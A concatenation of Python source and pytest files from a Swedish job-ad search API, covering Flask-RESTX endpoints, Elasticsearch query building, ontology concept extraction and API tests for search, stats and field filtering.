if not any(v is not None for v in args.values()):
abort(400, "Minst en av sökparametrarna nyckelord, kommunid, yrkesid, "
"organisationsnummer, yrkesgruppid, varaktighetid, yrkesomradeid, "
"landid, lanid, anstallningstyp eller omradeid måste vara satta")
results = repository.matcha(args, sida, rader)
return results
@ns_legacy.route('<platsannonsid>')
class ShowPlatsannons(Resource):
@ns_legacy.marshal_with(model.platsannons)
def get(self, platsannonsid):
r = repository.fetch_platsannons(platsannonsid)
return r
@ns_legacy.route('<platsannonsid>/logotyp')
class ShowPlatsannonsLogotyp(Resource):
def get(self, platsannonsid):
log.debug("Showing logo %s" % platsannonsid)
return repository.fetch_platsannons_logo(platsannonsid)
@ns_legacy.route('version')
class ShowVersion(Resource):
def get(self):
if request.headers['Accept'] in ['*/*', 'text/plain']:
return "version: 1.1.0"
else:
return {"platsannonser": {"version": "1.1.0"}}
``` |
{
"source": "JobtechSwe/sokannonser-api",
"score": 3
} |
#### File: sokannonser-api/common/helpers.py
```python
import time
def calculate_utc_offset():
is_dst = time.daylight and time.localtime().tm_isdst > 0
utc_offset = - (time.altzone if is_dst else time.timezone)
return int(utc_offset / 3600) if utc_offset > 0 else 0
```
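The returned offset is meant to shift Elasticsearch date-math bounds from UTC towards local wall-clock time. A hedged sketch of that kind of use (assumed usage; the field name mirrors the publication-date filters elsewhere in this repository):
```python
# Sketch only: splicing the local offset into an Elasticsearch date-math bound.
offset_hours = calculate_utc_offset()
now_local = ("now/m+%dH/m" % offset_hours) if offset_hours else "now/m"
publication_filter = {"range": {"publication_date": {"lte": now_local}}}
```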
#### File: sokannonser/repository/text_to_concept.py
```python
import logging
import time
from common import settings
from sokannonser.repository.ontology import Ontology
from common.elastic_connection_with_retries import create_elastic_client_with_retry
from sokannonser.repository.helpers import clean_plus_minus
log = logging.getLogger(__name__)
OP_NONE = ''
OP_PLUS = '+'
OP_MINUS = '-'
class TextToConcept(object):
COMPETENCE_KEY = 'KOMPETENS'
OCCUPATION_KEY = 'YRKE'
TRAIT_KEY = 'FORMAGA'
LOCATION_KEY = 'GEO'
REMOVED_TAG = '<removed>'
def __init__(self, ontologyhost='127.0.0.1', ontologyport=9200,
ontologyindex=settings.ONTOLOGY_INDEX, ontologyuser=None, ontologypwd=None):
log.info("Creating Ontology elastic client")
self.client = create_elastic_client_with_retry(ontologyhost, ontologyport, ontologyuser, ontologypwd)
self.ontologyindex = ontologyindex
self.ontology = None
if not settings.DELAY_ONTOLOGY_STARTUP:
self.get_ontology()
def get_ontology(self):
if self.ontology is None:
start_time = int(time.time() * 1000)
log.info(f'Creating Ontology, ontologyindex: {self.ontologyindex}')
self.ontology = Ontology(client=self.client,
index=self.ontologyindex,
annons_index=settings.ES_INDEX,
concept_type=None,
include_misspelled=True)
log.info(f"Ontology created after: {int(time.time() * 1000 - start_time)} ms")
return self.ontology
def text_to_concepts(self, text):
        # Note: Remove any '+' and '-' in every freetext query word since flashText is
# configured so it can't find words starting with minus/hyphen.
search_text = clean_plus_minus(text)
text_lower = text.lower()
ontology_concepts_orig = self.get_ontology().get_concepts(search_text, concept_type=None, span_info=True)
ontology_concepts = [c[0] for c in ontology_concepts_orig]
log.debug(f'Text: {text} ontology_concepts: {ontology_concepts}')
text_lower_plus_blank_end = text_lower + ' '
for concept in ontology_concepts:
concept_term = concept['term']
negative_concept_term = '-' + concept_term + ' '
if ' ' + negative_concept_term in text_lower_plus_blank_end or \
text_lower_plus_blank_end.startswith(negative_concept_term):
concept['operator'] = OP_MINUS
elif '+' + concept_term + ' ' in text_lower_plus_blank_end:
concept['operator'] = OP_PLUS
else:
concept['operator'] = OP_NONE
skills = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_NONE)]
occupations = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_NONE)]
traits = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_NONE)]
locations = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_NONE)]
skills_must = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_PLUS)]
occupations_must = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_PLUS)]
traits_must = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_PLUS)]
locations_must = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_PLUS)]
skills_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_MINUS)]
occupations_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_MINUS)]
traits_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_MINUS)]
locations_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_MINUS)]
result = {'skill': skills,
'occupation': occupations,
'trait': traits,
'location': locations,
'skill_must': skills_must,
'occupation_must': occupations_must,
'trait_must': traits_must,
'location_must': locations_must,
'skill_must_not': skills_must_not,
'occupation_must_not': occupations_must_not,
'trait_must_not': traits_must_not,
'location_must_not': locations_must_not}
return result
@staticmethod
def filter_concepts(concept, concept_type, operator):
return concept['type'] == concept_type and concept['operator'] == operator
```
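A tiny standalone check of the static helper at the end of the class, assuming the module's constants and class above are in scope; the concept dict is illustrative and no Elasticsearch is needed:
```python
# Illustrative only: filter_concepts keeps concepts matching both type and operator.
concept = {"term": "python", "type": "KOMPETENS", "operator": "+"}
assert TextToConcept.filter_concepts(concept, TextToConcept.COMPETENCE_KEY, OP_PLUS)
assert not TextToConcept.filter_concepts(concept, TextToConcept.COMPETENCE_KEY, OP_MINUS)
assert not TextToConcept.filter_concepts(concept, TextToConcept.OCCUPATION_KEY, OP_PLUS)
```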
#### File: sokannonser/repository/valuestore.py
```python
import logging
import json
from common import settings, fields, fields as f, taxonomy
from common.main_elastic_client import elastic_client
from common.elastic_connection_with_retries import elastic_search_with_retry
from common.taxonomy import tax_type, annons_key_to_jobtech_taxonomy_key
log = logging.getLogger(__name__)
taxonomy_cache = {}
reverse_tax_type = {item[1]: item[0] for item in tax_type.items()}
def _build_query(query_string, taxonomy_code, entity_type, offset, limit):
musts = []
sort = None
if query_string:
musts.append({"bool": {"should": [
{
"match_phrase_prefix": {
"label": {
"query": query_string
}
}
},
{
"term": {
"concept_id": {"value": query_string}
}
},
{
"term": {
"legacy_ams_taxonomy_id": {"value": query_string}
}
}
]}})
else:
# Sort numerically for non-query_string-queries
sort = [
{
"legacy_ams_taxonomy_num_id": {"order": "asc"}
}
]
if taxonomy_code:
if not isinstance(taxonomy_code, list):
taxonomy_code = [taxonomy_code]
terms = [{"term": {"parent.legacy_ams_taxonomy_id": t}} for t in taxonomy_code]
terms += [{"term": {"parent.concept_id.keyword": t}} for t in taxonomy_code]
terms += [{"term":
{"parent.parent.legacy_ams_taxonomy_id": t}
} for t in taxonomy_code]
terms += [{"term":
{"parent.parent.concept_id.keyword": t}
} for t in taxonomy_code]
parent_or_grandparent = {"bool": {"should": terms}}
# musts.append({"term": {"parent.id": taxonomy_code}})
musts.append(parent_or_grandparent)
if entity_type:
musts.append({"bool": {"should": [{"term": {"type": et}} for et in entity_type]}})
# musts.append({"term": {"type": entity_type}})
if not musts:
query_dsl = {"query": {"match_all": {}}, "from": offset, "size": limit}
else:
query_dsl = {
"query": {
"bool": {
"must": musts
}
},
"from": offset,
"size": limit
}
if sort:
query_dsl['sort'] = sort
query_dsl['track_total_hits'] = True
return query_dsl
def find_concept_by_legacy_ams_taxonomy_id(elastic_client, taxonomy_type, legacy_ams_taxonomy_id,
not_found_response=None):
query = {
"query": {
"bool": {
"must": [
{"term": {"legacy_ams_taxonomy_id": {
"value": legacy_ams_taxonomy_id}}},
{"term": {
"type": {
"value": annons_key_to_jobtech_taxonomy_key.get(taxonomy_type, '')
}
}}
]
}
}
}
elastic_response = elastic_search_with_retry(elastic_client, query, settings.ES_TAX_INDEX_ALIAS)
hits = elastic_response.get('hits', {}).get('hits', [])
if not hits:
log.warning(f"No taxonomy entity found for type: {taxonomy_type} and legacy id: {legacy_ams_taxonomy_id}")
return not_found_response
return hits[0]['_source']
def find_concepts(elastic_client, query_string=None, taxonomy_code=[], entity_type=[], offset=0, limit=10):
query_dsl = _build_query(query_string, taxonomy_code, entity_type, offset, limit)
log.debug(f"Query: {json.dumps(query_dsl)}")
elastic_response = elastic_search_with_retry(client=elastic_client, query=query_dsl,
index=settings.ES_TAX_INDEX_ALIAS)
log.debug(
f"(find_concepts) took: {elastic_response.get('took', '')}, timed_out: {elastic_response.get('timed_out', '')}")
if elastic_response:
return elastic_response
else:
log.error(f"Failed to query Elasticsearch, query: {query_dsl} index: {settings.ES_TAX_INDEX_ALIAS}")
return None
def get_stats_for(taxonomy_type):
value_path = {
taxonomy.OCCUPATION: "%s.%s.keyword" %
(fields.OCCUPATION, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.GROUP: "%s.%s.keyword" % (
fields.OCCUPATION_GROUP, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.FIELD: "%s.%s.keyword" % (
fields.OCCUPATION_FIELD, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.SKILL: "%s.%s.keyword" % (fields.MUST_HAVE_SKILLS,
fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.MUNICIPALITY: "%s" % fields.WORKPLACE_ADDRESS_MUNICIPALITY_CODE,
taxonomy.REGION: "%s" % fields.WORKPLACE_ADDRESS_REGION_CODE
}
# Make sure we don't crash if we want to stat on missing type
for tt in taxonomy_type:
if tt not in value_path:
log.warning(f"Taxonomy type: {taxonomy_type} not configured for aggs.")
return {}
aggs_query = {
"from": 0, "size": 0,
"query": {
"bool": {
"must": [{"match_all": {}}],
'filter': [
{
'range': {
fields.PUBLICATION_DATE: {
'lte': 'now/m'
}
}
},
{
'range': {
fields.LAST_PUBLICATION_DATE: {
'gte': 'now/m'
}
}
},
{
'term': {
fields.REMOVED: False
}
},
]
}
},
"aggs": {
"antal_annonser": {
"terms": {"field": value_path[taxonomy_type[0]], "size": 5000},
}
}
}
log.debug(f'(get_stats_for) aggs_query: {json.dumps(aggs_query)}')
aggs_result = elastic_search_with_retry(elastic_client(), aggs_query, settings.ES_INDEX)
code_count = {
item['key']: item['doc_count']
for item in aggs_result['aggregations']['antal_annonser']['buckets']}
return code_count
```
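To make the query construction concrete, a hedged sketch of calling `_build_query` directly; the module path is taken from the file header and the resulting DSL is only described in the comment:
```python
# Illustrative only: the DSL produced for a free-text concept lookup.
import json
from sokannonser.repository.valuestore import _build_query

dsl = _build_query(query_string="lärare", taxonomy_code=None, entity_type=None, offset=0, limit=5)
# A bool query matching label (phrase prefix), concept_id or legacy_ams_taxonomy_id,
# with from=0, size=5 and track_total_hits=True; no sort clause when a query string is given.
print(json.dumps(dsl, ensure_ascii=False, indent=2))
```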
#### File: rest/endpoint/historical.py
```python
import logging
import time
from flask_restx import abort
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from sokannonser.repository.platsannonser import fetch_platsannons
from sokannonser.repository.querybuilder import QueryBuilderType
from sokannonser.repository.stats.stats import get_stats
from sokannonser.rest.endpoint.common import QueryBuilderContainer, \
search_endpoint, mock_result_with_only_original_values
from sokannonser.rest.model.apis import ns_historical, open_results, job_ad
from sokannonser.rest.model.queries import load_ad_query, historical_query, stats_query
from sokannonser.rest.model.swagger import swagger_doc_params, swagger_filter_doc_params
from common import settings
import elasticapm
log = logging.getLogger(__name__)
querybuilder_container = QueryBuilderContainer()
@ns_historical.route('ad/<id>', endpoint='ad')
class AdById(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')] # TODO: Change api_identifier?
@ns_historical.doc(
description='Load a job ad by ID',
)
@ns_historical.response(401, 'Invalid API-key')
@ns_historical.response(404, 'Job ad not found')
@ns_historical.expect(load_ad_query)
@ns_historical.marshal_with(job_ad)
def get(self, id, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
result = fetch_platsannons(str(id))
if result.get('removed'):
abort(404, 'Ad not found')
else:
return mock_result_with_only_original_values([result])[0]
@ns_historical.route('search')
class Search(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')] # TODO: Change api_identifier?
@ns_historical.doc(
description='Search using parameters and/or freetext',
params={
settings.HISTORICAL_FROM: 'Search ads from this date',
            settings.HISTORICAL_TO: 'Search ads until this date',
settings.REQUEST_TIMEOUT: 'Set the query timeout in seconds (some historical queries may take several minutes).',
**swagger_doc_params, **swagger_filter_doc_params
},
)
@ns_historical.response(401, 'Invalid API key')
@ns_historical.expect(historical_query)
@ns_historical.marshal_with(open_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time() * 1000)
args = historical_query.parse_args()
return search_endpoint(querybuilder_container.get(QueryBuilderType.HISTORICAL_SEARCH), args, start_time)
@ns_historical.route('stats')
class Stats(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
@ns_historical.doc(
description='Load stats by taxonomy type',
params={
settings.APIKEY: "Required API key",
            settings.TAXONOMY_TYPE: "One or more taxonomy types; by default all are returned (available fields: "
"occupation-name, occupation-group, occupation-field, employment-type,"
" country, region, municipality, skill, language). ",
settings.STATS_BY: "Search taxonomy type with different fields",
settings.LIMIT: "Maximum number of statistical rows per taxonomy field"
},
)
@ns_historical.response(401, 'Invalid API key')
@ns_historical.expect(stats_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
args = stats_query.parse_args()
return get_stats(args)
```
#### File: api_tests/historical/test_historical_stats.py
```python
import sys
import pytest
import requests
from tests.test_resources.helper import get_search, get_search_expect_error, get_stats
from tests.test_resources.ad_fields_data_type import check_historical_stats
from tests.test_resources.historical import compare_keys, check_default_values, all_keys, all_stats, default_values
from tests.test_resources.settings import NUMBER_OF_ADS
from common.settings import TAXONOMY_TYPE_LIST
pytestmark = pytest.mark.historical
def test_all_stats_key_names(historical_stats):
compare_keys(historical_stats)
def test_all_stats_format(historical_stats):
"""
check types in the return value
"""
for key, stats in historical_stats.items():
check_historical_stats(stats)
def test_all_stats_sorting_order_in_stat_type(historical_stats):
"""
Checks that items for each stats type are sorted descending
"""
check_sort_order(historical_stats)
def check_sort_order(stats):
for key, stats in stats.items():
highest_value = sys.maxsize
for item in stats:
assert item['occurrences'] <= highest_value
highest_value = item['occurrences']
@pytest.mark.parametrize('limit', [0, 1, 2, 4, 6, 9, 10, 11, 99, 1025, '1'])
def test_all_stats_limit(session, limit):
stats = get_stats(session, {'limit': limit})
compare_keys(stats)
def test_all_stats_default_limit(historical_stats):
"""
Check that there are 10 items, except for 'employment-type' which only has 6 possible values
"""
check_default_values(historical_stats)
def test_all_stats_zero_limit(session):
"""
Check that all fields are present and their lists are empty when using limit: 0
"""
stats = get_stats(session, {'limit': 0})
compare_keys(stats)
def test_all_stats_none_limit(session):
"""
Check that all fields are present and their lists have default values when using limit: None
"""
stats = get_stats(session, {'limit': None})
compare_keys(stats)
check_default_values(stats)
@pytest.mark.smoke
@pytest.mark.parametrize("taxonomy_type", TAXONOMY_TYPE_LIST)
def test_taxonomy_type_single(session, taxonomy_type):
params = {'taxonomy-type': taxonomy_type}
result = get_stats(session, params)
assert len(result) == 1
if taxonomy_type == 'employment-type':
assert len(result[taxonomy_type]) == 6
else:
assert len(result[taxonomy_type]) == default_values
check_sort_order(result)
def test_taxonomy_type_all(session):
taxonomy_types = ','.join(TAXONOMY_TYPE_LIST) # comma-separated string
params = {'taxonomy-type': taxonomy_types}
result = get_stats(session, params)
assert len(result) == 9
for key, value in result.items():
if key == 'employment-type':
assert len(value) == 6
else:
assert len(value) == default_values
check_sort_order(result)
# SEARCH
@pytest.mark.smoke
@pytest.mark.parametrize("stats_type", ['occupation-name', 'occupation-group', 'municipality', 'region', 'country'])
def test_stats(session, stats_type):
"""
    Check the total ad count, the number of top-level response keys and that the requested stats type returns five values.
"""
result = get_search(session, {'stats': stats_type})
assert result['total']['value'] == NUMBER_OF_ADS
assert len(result) == 7
assert len(result['stats'][0]['values']) == 5
@pytest.mark.parametrize('stats_type', ['employment-type', 'language', 'skill'])
def test_bad_request(session, stats_type):
get_search_expect_error(session, {'stats': stats_type}, expected_http_code=requests.codes.bad_request)
def test_multiple_stats(session):
"""
    Call the search endpoint with an increasing number of stats parameters and check each result.
"""
for ix, stats_type in enumerate(all_stats):
current_len = ix + 1
stats_list = all_stats[0:current_len]
print(stats_list)
params = {'stats': stats_list}
result = get_search(session, params)
result_stats = result['stats']
assert len(result_stats) == current_len
for item in result_stats:
assert len(item['values']) == 5
```
#### File: api_tests/jobstream/test_stream_live_data.py
```python
import pytest
from tests.test_resources.helper import get_stream
from common.settings import UPDATED_BEFORE_DATE
from tests.test_resources.test_settings import NUMBER_OF_ADS, DAWN_OF_TIME, current_time_stamp
# mark all tests in this file as @pytest.mark.jobstream
pytestmark = pytest.mark.jobstream
def test_stream_filter_on_date_interval(session):
params = {'date': DAWN_OF_TIME, UPDATED_BEFORE_DATE: current_time_stamp}
list_of_ads = get_stream(session, params)
assert len(list_of_ads) >= NUMBER_OF_ADS
```
#### File: searching/common/test_get_ad_by_id.py
```python
import random
import requests
import pytest
from tests.test_resources.helper import get_by_id
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
def test_get_by_id(session, random_ads):
ad_ids = []
for ad in random_ads:
ad_ids.append(ad['id'])
subset_of_ids = random.sample(ad_ids, 3)
for ad_id in subset_of_ids:
ad = get_by_id(session, ad_id)
assert ad['id'] == ad_id
def test_fetch_not_found_ad_by_id(session):
with pytest.raises(requests.exceptions.HTTPError):
get_by_id(session, ad_id='823069282306928230692823069282306928230692')
```
#### File: searching/common/test_quotes.py
```python
import pytest
from tests.test_resources.helper import get_search, compare
from tests.test_resources.test_settings import EXPECTED_GYMNASIE_LARARE
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
@pytest.mark.parametrize("query, expected_number_of_hits, identifier", [
('"gymnasielärare"', 18, 'a'),
("'gymnasielärare'", EXPECTED_GYMNASIE_LARARE, 'b'),
("\"gymnasielärare\"", 18, 'c'),
("\'gymnasielärare\'", EXPECTED_GYMNASIE_LARARE, 'd'),
("""gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'e'),
('''gymnasielärare''', EXPECTED_GYMNASIE_LARARE, 'f'),
('gymnasielärare', EXPECTED_GYMNASIE_LARARE, 'g'),
("gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'h'),
("gymnasielärare\"", EXPECTED_GYMNASIE_LARARE, 'i'),
("gymnasielärare\'", EXPECTED_GYMNASIE_LARARE, 'j'),
(r"""gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'k'),
(r'''gymnasielärare''', EXPECTED_GYMNASIE_LARARE, 'l'),
("gymnasielärare lärare", 259, 'm'),
("""'gymnasielärare'""", EXPECTED_GYMNASIE_LARARE, 'n'),
('''"gymnasielärare" "lärare"''', 357, 'o'),
('''"gymnasielärare lärare"''', 0, 'p'),
("\"gymnasielärare\"", 18, 'q'),
("\"gymnasielärare", 18, 'r'),
('''"gymnasielärare"''', 18, 's'),
("gymnasielärare", EXPECTED_GYMNASIE_LARARE, 't'),
('gymnasielärare', EXPECTED_GYMNASIE_LARARE, 'u'),
])
def test_query_with_different_quotes(session, query, expected_number_of_hits, identifier):
json_response = get_search(session, params={'q': query, 'limit': '0'})
compare(json_response['total']['value'], expected_number_of_hits, msg=f'Query: {query}')
@pytest.mark.parametrize('query, expected', [
('"c++', 62),
('"c++"', 62),
('"c+', 41),
('"c( ', 40),
])
def test_cplusplus_in_quotes(session, query, expected):
"""
Test for a bug where some quotes caused an 'internal server error' response
"""
param = {'q': query, 'limit': 0}
assert get_search(session, param)['total']['value'] == expected
@pytest.mark.parametrize("query, expected_number_of_hits", [
('python stockholm', 27),
('"python stockholm"', 0),
('"python" "stockholm"', 957),
('"python" stockholm', 843),
('python "stockholm"', 76),
('"python job in stockholm"', 0),
('"work from home" python stockholm', 27)
])
def test_query_with_quotes(session, query, expected_number_of_hits):
json_response = get_search(session, params={'q': query, 'limit': '100'})
compare(json_response['total']['value'], expected_number_of_hits, msg=f'Query: {query}')
```
#### File: searching/common/test_remote_work.py
```python
import pytest
from sokannonser.rest.model.swagger import REMOTE_MATCH_PHRASES
from tests.test_resources.helper import get_search, get_total
from tests.test_resources.test_settings import TEST_USE_STATIC_DATA
from common.settings import REMOTE
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on specific data set")
@pytest.mark.parametrize('remote, expected', [(True, 34), (False, 4995)])
def test_remote_number_of_ads(session, remote, expected):
params = {REMOTE: remote, 'limit': 100}
number_of_hits = get_search(session, params)['total']['value']
assert number_of_hits == expected
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on specific data set")
@pytest.mark.parametrize('query, expected_remote, expected_not_remote', [
('utvecklare', 2, 131),
('mötesbokare', 0, 9),
('tekniker', 0, 27),
('säljare', 1, 224),
])
def test_remote_query(session, query, expected_remote, expected_not_remote):
remote = get_total(session, {'q': query, REMOTE: True, 'limit': 0})
not_remote = get_total(session, {'q': query, REMOTE: False, 'limit': 0})
assert remote == expected_remote
assert not_remote == expected_not_remote
@pytest.mark.parametrize('query', ['hemifrån', 'säljare', 'java', 'lärare', 'tekniker'])
def test_remote_query_content(session, query):
"""
Check that ads have at least one phrase associated with remote work
in description or title when using 'remote': True
"""
successes = []
result = get_search(session, {'q': query, REMOTE: True, 'limit': 100})
hits = result['hits']
for hit in hits:
for phrase in REMOTE_MATCH_PHRASES:
if phrase in hit['description']['text'].lower() or phrase in hit['headline'].lower():
successes.append(True)
break
assert len(successes) >= len(hits)
@pytest.mark.parametrize("remote", [True, False])
def test_remote_binary(session, remote):
params = {REMOTE: remote, 'limit': 100}
response = get_search(session, params)
for hit in response['hits']:
text_to_check = f"{hit['description']['text']} {hit['headline']}".lower()
assert remote == any(x in text_to_check for x in REMOTE_MATCH_PHRASES)
@pytest.mark.parametrize("query", ['säljare', 'java', 'sjuksköterska'])
@pytest.mark.parametrize("remote", [True, False])
def test_remote_binary_with_query(session, query, remote):
params = {'q': query, REMOTE: remote, 'limit': 100}
response = get_search(session, params)
for hit in response['hits']:
text_to_check = f"{hit['description']['text']} {hit['headline']}".lower()
assert remote == any(x in text_to_check for x in REMOTE_MATCH_PHRASES)
def test_sum_remote(session):
remote_none = get_total(session, params={'limit': 0})
remote_true = get_total(session, params={'remote': True, 'limit': 0})
remote_false = get_total(session, params={'remote': False, 'limit': 0})
assert remote_false + remote_true == remote_none
```
#### File: searching/common/test_stats.py
```python
import pytest
from tests.test_resources.concept_ids import concept_ids_geo as geo
from tests.test_resources.helper import get_search, compare_multiple
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
@pytest.mark.parametrize("limit, stats_limit, expected_number_of_hits, expected_values", [
(10, 0, 10, 5),
(10, 10, 10, 10),
(10, 15, 10, 15)
])
def test_stats(session, limit, stats_limit, expected_number_of_hits, expected_values):
params = {'stats': 'region', 'offset': 0, 'limit': limit, 'stats.limit': stats_limit}
results_json = get_search(session, params)
compare_these = []
compare_these.append((len(results_json['hits']), expected_number_of_hits, "wrong number of hits"))
compare_these.append((len(results_json['stats'][0]['values']), expected_values, 'wrong stats.values'))
compare_multiple(compare_these)
def test_stats_details(session):
params = {'stats': 'region', 'offset': 0, 'limit': 0, 'stats.limit': 5}
results_json = get_search(session, params)
expected_results = [('Stockholms län', 1227, geo.stockholms_lan, '01'),
('Västra Götalands län', 779, geo.vastra_gotalands_lan, '14'),
('Skåne län', 643, geo.skane_lan, '12'),
('Östergötlands län', 249, geo.ostergotlands_lan, '05'),
('Jönköpings län', 195, geo.jonkopings_lan, '06'),
('Uppsala län', 55, geo.uppsala_lan, '03'),
]
compare_these = []
for index, result in enumerate(results_json['stats'][0]['values']): # results should be sorted
compare_these.append((result['term'], expected_results[index][0], 'wrong term'))
compare_these.append((result['count'], expected_results[index][1], 'wrong count'))
compare_these.append((result['concept_id'], expected_results[index][2], 'wrong concept_id'))
compare_these.append((result['code'], expected_results[index][3], 'wrong code'))
compare_multiple(compare_these)
```
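`compare_multiple` is assumed to take a list of `(actual, expected, message)` tuples and report every mismatch at once instead of stopping at the first failed assert, which is why the tests above collect comparisons before calling it. A minimal sketch under that assumption:
```python
# Hypothetical sketch of compare_multiple from tests/test_resources/helper.py:
# collect all mismatches first, then fail once with a combined message.
def compare_multiple(comparisons):
    errors = []
    for actual, expected, message in comparisons:
        if actual != expected:
            errors.append(f"{message}: got {actual!r}, expected {expected!r}")
    assert not errors, "\n".join(errors)
```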
#### File: searching/common/test_taxonomy_original_value.py
```python
import pytest
from tests.test_resources import elastic_data
from tests.test_resources.helper import get_by_id
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def test_original(session):
for test_data in elastic_data.occupations_from_elastic:
# find occupation with legacy id and check that such value exists
assert (original_occupation := next(
(item for item in test_data['occupations'] if item["legacy_ams_taxonomy_id"] is not None),
None)) is not None
api_response = get_by_id(session, test_data['_id'])
assert original_occupation['concept_id'] == api_response['occupation']['concept_id']
```
#### File: searching/common/test_unspecified_sweden_workplace.py
```python
import pytest
from tests.test_resources.helper import get_search
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def test_unspecified_sweden_workplace(session):
params = {'unspecified-sweden-workplace': 'true', 'offset': 0, 'limit': 100, 'stats': 'region'}
result_json = get_search(session, params)
hits = result_json['hits']
assert len(hits) >= 46 # for use on static test data or prod
for hit in hits:
assert hit['workplace_address']['region'] is None
assert hit['workplace_address']['municipality'] is None
assert hit['workplace_address']['municipality_code'] is None
assert hit['workplace_address']['municipality_concept_id'] is None
assert hit['workplace_address']['region'] is None
assert hit['workplace_address']['region_code'] is None
assert hit['workplace_address']['region_concept_id'] is None
assert hit['workplace_address']['street_address'] is None
assert hit['workplace_address']['postcode'] is None
assert hit['workplace_address']['city'] is None
assert hit['workplace_address']['coordinates'] == [None, None]
assert hit['relevance'] == 0.0
```
#### File: searching/common/test_xfields.py
```python
import json
import copy
import pytest
import requests
from tests.test_resources.test_settings import NUMBER_OF_ADS
from tests.test_resources.test_settings import test_headers, TEST_URL
X_FIELDS = 'X-Fields'
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def _get_with_additional_headers(additional_headers, params=None):
    params = params or {}
    headers = copy.deepcopy(test_headers)
headers.update(additional_headers)
response = requests.get(TEST_URL + "/search", params=params, headers=headers)
response.raise_for_status()
return json.loads(response.content.decode('utf8'))
def test_empty_x_field():
"""
    Expect the same response as if the X-Fields header is not used
"""
r = _get_with_additional_headers({X_FIELDS: ''})
assert r['total']['value'] == NUMBER_OF_ADS
assert len(r) == 7
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 35
def test_x_fields_ad_teaser():
x_fields_for_ad_teaser = "hits{id, publication_date, publication_date, headline, occupation, employer, workplace_address, positions}"
r = _get_with_additional_headers({X_FIELDS: x_fields_for_ad_teaser})
assert len(r) == 1
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 6
def test_x_fields_workplace_address():
x_fields_for_address = "hits{workplace_address{municipality, municipality_code,region,region_code, country, country_code , street_address, postcode, city, coordinates}}"
r = _get_with_additional_headers({X_FIELDS: x_fields_for_address})
assert len(r) == 1
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 1
assert len(r['hits'][0]['workplace_address']) == 10
def test_x_fields_with_query():
params = {'q': 'sjuksköterska'}
r = _get_with_additional_headers({X_FIELDS: "hits{headline, occupation, employer, workplace_address}"}, params)
assert len(r['hits'][0]) == 4
assert len(r['hits']) == 10
for field in ['headline', 'occupation', 'employer', 'workplace_address']:
no_key_error = r['hits'][0][field]
```
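The `X-Fields` header used above is the field mask supported by Flask-RESTX (the framework imported in the main codebase): curly braces select which keys of the response, including nested objects, are returned. A hedged request sketch; the mask below reuses field names that appear in the tests and is only an illustration of the syntax:
```python
# Sketch: request only the headline and the nested workplace city for each hit.
import requests

from tests.test_resources.test_settings import TEST_URL, test_headers

headers = dict(test_headers, **{'X-Fields': 'hits{headline, workplace_address{city}}'})
response = requests.get(TEST_URL + "/search", params={'q': 'sjuksköterska'}, headers=headers)
response.raise_for_status()
for hit in response.json()['hits']:
    print(hit['headline'], hit['workplace_address']['city'])
```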
#### File: searching/jobsearch/test_complete_with_filters.py
```python
import pytest
from tests.test_resources.helper import get_complete
from tests.test_resources.concept_ids import concept_ids_geo as geo
# mark all tests in this file as @pytest.mark.jobsearch
pytestmark = pytest.mark.jobsearch
@pytest.mark.parametrize('query', ['sjukköt', 'sjuksköt', 'servit', 'srvitr', 'progr', 'prgram'])
def test_different_numbers_with_filter(session, query):
"""
    Check that the top typeahead suggestion has fewer occurrences when a geographical (municipality or region) filter is applied; the queries are intentionally misspelled or truncated
"""
json_response_no_filter = get_complete(session, params={'q': query})
top_value_no_filter = json_response_no_filter['typeahead'][0]['occurrences']
top_word_no_filter = json_response_no_filter['typeahead'][0]['value']
json_response_municipality_filter = get_complete(session, params={'q': query, 'municipality': geo.stockholm})
top_value_municipality_filter = json_response_municipality_filter['typeahead'][0]['occurrences']
top_word_municipality_filter = json_response_municipality_filter['typeahead'][0]['value']
